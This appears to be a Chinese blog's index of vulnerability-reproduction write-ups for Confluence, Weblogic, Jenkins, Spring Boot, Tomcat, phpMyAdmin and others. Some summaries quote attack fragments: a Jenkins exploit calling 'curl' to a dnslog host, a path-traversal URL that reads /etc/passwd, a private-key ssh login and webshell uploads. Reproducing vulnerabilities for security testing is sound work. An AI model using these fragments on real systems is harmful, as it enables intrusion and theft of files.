漏洞复现
文章平均质量分 61
LQxdp
红蓝对抗、渗透测试、应急响应。
展开
-
泛微云桥前台文件上传漏洞-202408
静态分析代码流程:先看方法有没有声明,没有声明使用 jd-gui 反编译工具 search 搜索要跳转的类方法,定位到后再去 idea 里查看有无声明,再无声明可结合 jd-gui、jar-analyzer工具搜索查找。动态分析:每一步都可以打断点动态分析一下,可以随时在每一步骤中用到的方法进行断点分析。原创 2024-08-18 10:29:23 · 976 阅读 · 0 评论 -
confluence模版注入漏洞_CVE-2023-22527
Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。原创 2024-01-24 17:23:42 · 605 阅读 · 0 评论 -
齐治堡垒机私钥登录及后渗透
(目前在 php 版本齐治成功,其他版本未测试)1、老、新版本私钥。2、直接指定私钥登录,可以使用 xshell、命令行(ssh 端口可能是 22 或者 8022)命令行命令:ssh root@1.1.1.1 -i rsa -p 22我这里直接使用 xshell 登录了。登录成功。原创 2024-01-23 14:36:11 · 960 阅读 · 0 评论 -
Hashicorp Consul Service API远程命令执行漏洞
2018年11月27日,Consul在官方博客中发布了有关Consul工具可能存在远程命令执行(RCE)漏洞的公告,并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具,旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案,Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,无需依赖其他工具(如ZooKeeper等),使用也相对简单。原创 2024-01-18 14:22:40 · 3781 阅读 · 0 评论 -
帆软V9任意文件覆盖漏洞+无损上传
由于WebReport V9在安装之后在WebReport目录下存在update.jsp和update1.jsp,因此可以构造payload直接覆盖这两个文件的内容,从而GetShell。要由chartmapsvg开头,包含.svg时会先创建文件,然后再到后续逻辑,所以只需要xxx.svg.jsp这种格式,不需要覆盖原有文件即可无损利用成功。上传其他 webshell 同理,建议哥斯拉、冰蝎等等。注意:木马的双引号要转义一下。原创 2024-01-15 16:50:28 · 1991 阅读 · 0 评论 -
帆软后台(外观配置-主题)文件上传漏洞
webapps/WebReport/WEB-INF/resources/fstheme/fs-theme-test/目录下名称为app.jsp,但当前目录并非 web 目录,web 无法访问 webshell。/webapps/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-app/ 路径下。添加主题上传的压缩包中放入shell.jsp马 (没有添加主题功能直接构造数据包)原创 2024-01-15 16:48:39 · 1008 阅读 · 0 评论 -
gitlab 命令执行漏洞(CVE-2022-2992)
GitLab CE/EE 中的一个漏洞影响从 11.10 开始到 15.1.6 之前的所有版本、从 15.2 开始到 15.2.4 之前的所有版本、从 15.3 开始到 15.3.2 之前的所有版本。允许经过身份验证的用户通过从 GitHub API 端点导入实现远程代码执行。查看 gitlab 版本。(登录后才能看到)原创 2024-01-15 15:50:03 · 1813 阅读 · 0 评论 -
springboot读取shirokey命令执行
0x1 简介当springboot遇到shiro,一切变得合理了起来。0x2 利用存在springboot env页面https://xxx/api/actuator/env但未发现明文shirokey,如图这种的。使用visualvm工具读取shiro字节类型key。下载:https://visualvm.github.io/download.html(工具在/bin目录下)导入heapdump,在过滤文件中搜索如下条件。org.apache.shiro.web.mgt.Cooki原创 2022-03-31 14:51:53 · 2113 阅读 · 1 评论 -
Spring-boot远程代码执行系列(eureka xstream deserialization RCE)
0x1 漏洞原理1.eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址。2.refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload。3.目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞。0x2 漏洞利用条件1.可以 POST 请求目标网站的 /env 接口设置属性2.可以 POST 请求目标网站的原创 2020-10-05 22:27:58 · 5869 阅读 · 2 评论 -
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE)
0x01 漏洞原理spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化原创 2020-06-18 23:37:22 · 8696 阅读 · 1 评论 -
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE)
0x01 漏洞原理spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解原创 2020-06-16 21:37:23 · 4200 阅读 · 0 评论 -
Jenkins远程命令执行漏洞(CVE-2018-1000861)
漏洞复现1、查看目标版本。curl -s -I http://xxx:8080| grep X-Jenkins2、利用工具。https://github.com/orangetw/awesome-jenkins-rce-2019usage:python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’3、成功接收dnslog。...原创 2020-05-23 22:16:58 · 3172 阅读 · 0 评论 -
Redis 4.x5.x 未授权访问漏洞(RCE)
0x01 简介Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。0x02 漏洞复现1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在未授权访问漏洞。2、使用如下POC即可直接执行命令。工具地址:https://github.com/vulhub/redis-rogu...原创 2020-02-14 22:36:02 · 1406 阅读 · 1 评论 -
PostgreSQL从弱口令到RCE(CVE-2019-9193)
0x01 简介PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。0x02 影响版本postgresql 9.3-110x03 漏洞复现1、使用“超级弱口令”爆破处postgresql数据库账号密码。2、使用“Navicat Premium”连接postgres...原创 2020-01-29 20:52:36 · 3072 阅读 · 0 评论 -
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
0x01 简介本漏洞根源是PHP5.6.13前的版本在读取存储好的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。通过Joomla中的Gadget,可造成任意代码执行的结果。0x02 影...原创 2019-06-01 13:38:58 · 4576 阅读 · 0 评论 -
Weblogic 小于 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)
Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞复现:方法一:1.发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):POST /wls-wsat/CoordinatorPortType HTTP...原创 2019-02-16 16:52:33 · 691 阅读 · 0 评论 -
Weblogic 任意文件上传漏洞(CVE-2018-2894)
0x01 简介Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。0x02 影响版本weblogic 10.3.6.0weblogic 12.1.3.0weblogic ...原创 2019-02-17 17:23:39 · 1561 阅读 · 1 评论 -
Weblogic SSRF漏洞(CVE-2014-4210)
0x01 简介weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。0x02 影响版本weblogic 10.0.2 – 10.3.6版本0x03 漏洞复现SSRF漏洞测试:1.访问漏洞下面payload,检测服务器7001端口是否开放。http://target:7001/uddiexplorer/Searc...原创 2019-07-07 11:08:31 · 2702 阅读 · 0 评论 -
PHP imap 远程命令执行漏洞(CVE-2018-19518)
0x01 简介php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。...原创 2019-03-13 21:56:51 · 2599 阅读 · 2 评论 -
JBoss 5.x和6.x 反序列化漏洞(CVE-2017-12149)
0x01 漏洞简介该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了攻击者可以在服务器上执行任意代码。0x02 漏洞版本漏洞影响5.x和6.x版本的JBOSSAS。0x03 漏洞原理JBOSS Applic...原创 2019-03-02 17:30:47 · 1455 阅读 · 0 评论 -
Tomcat弱口令进后台getshell
0x01 简介Tomcat支持在后台不熟war文件,我们可以直接将webshell部署到web目录下。War包一般是进行Web开发时一个网站Project下的所有代码,包括前台HTML/CSS/JS代码,以及Java的代码。当开发人员开发完毕时,就会将源码打包给测试人员测试,测试完后若要发布则也会打包成War包进行发布。War包可以放在Tomcat下的webapps或word目录,当Tomc...原创 2019-02-26 14:49:01 · 1681 阅读 · 0 评论 -
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
0x01 简介在windows或linux服务器下将readonly参数设置为false(false并非默认配置),可通过PUT方法创建一个jsp文件,可执行任意命令。<servlet> <servlet-name>default</servlet-name> <servlet-class>org.apache原创 2019-02-19 16:14:53 · 1509 阅读 · 0 评论 -
Struts2 S2-057远程执行代码漏洞(CVE-2018-11776)
0x01 影响版本<= Struts 2.3.34,Struts 2.5.160x02 S2-057需要的条件-alwaysSelectFullNamespace为true。-action元素没有设置namespace属性,或者使用了通配符。命名空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。0x03 漏洞触发1.执行233*233http://yo...原创 2019-02-15 16:21:40 · 1259 阅读 · 0 评论 -
S2-012 远程代码执行漏洞
影响版本:Struts2: 2.1.0-2.3.13漏洞原理:如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如:<package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.acti...原创 2019-02-14 16:07:50 · 1012 阅读 · 0 评论 -
phpMyAdmin 2.x版本任意文件读取
0x01 简介phpmyadmin scripts/setup.php 页面存在反序列化漏洞(WooYun-2016-199433)phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。0x02 漏洞复现POST /scripts/setup.php HTTP/1.1Host: ip:8080User-Agent: Mozilla/5...原创 2019-01-18 17:16:34 · 865 阅读 · 0 评论 -
phpMyAdmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
0x01 简介phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。0x02 漏洞复现1.将?进行两次URL编码为"%253f",构造下列payload:http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd漏洞存在。2.在S...原创 2019-01-18 14:12:31 · 1946 阅读 · 0 评论